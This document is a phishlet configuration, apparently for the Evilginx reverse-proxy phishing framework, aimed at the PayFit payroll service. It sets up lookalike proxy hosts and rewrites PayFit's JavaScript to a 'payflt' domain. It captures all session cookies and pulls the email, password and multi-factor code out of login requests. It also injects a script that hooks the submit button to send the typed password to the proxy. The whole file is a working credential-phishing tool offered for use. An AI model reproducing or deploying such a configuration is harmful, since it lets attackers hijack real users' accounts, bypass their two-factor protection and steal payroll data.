min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'app', orig_sub: 'app', domain: 'payfit.com', session: true, is_landing: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: 'payfit.com', session: true, is_landing: false}
  - {phish_sub: 'translations', orig_sub: 'translations', domain: 'payfit.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'app.payfit.com', orig_sub: 'app', domain: 'payfit.com', search: ']*\.\?payfit', replace: ']*.?payflt', mimes: ['application/javascript']}
auth_tokens:
  - domain: '.payfit.com'
    keys: ['.*,regexp']
auth_urls:
  - '/auth/signin'
credentials:
  username:
    key: ''
    search: '"email":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'
  custom:
    key: ''
    search: '"multiFactorCode":"([^"]*)'
    type: 'json'

login:
  domain: 'app.payfit.com'
  path: '/' 
  

js_inject:
  - trigger_domains: ["app.payfit.com"]
    trigger_paths: ["/"]
    trigger_params: ["email"]
    script: |  
      function onclickListener() {     var submit = document.querySelectorAll('button[type=submit]')[0];     submit.setAttribute("onclick", "sendPass()");     return; }  function sendPass() {     var password = document.getElementById("password").value;      var xhr = new XMLHttpRequest();     xhr.open("POST", '/', true);     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");     xhr.send("pass=" + encodeURIComponent(password));     return; } setTimeout(function() {     onclickListener(); }, 1000);
  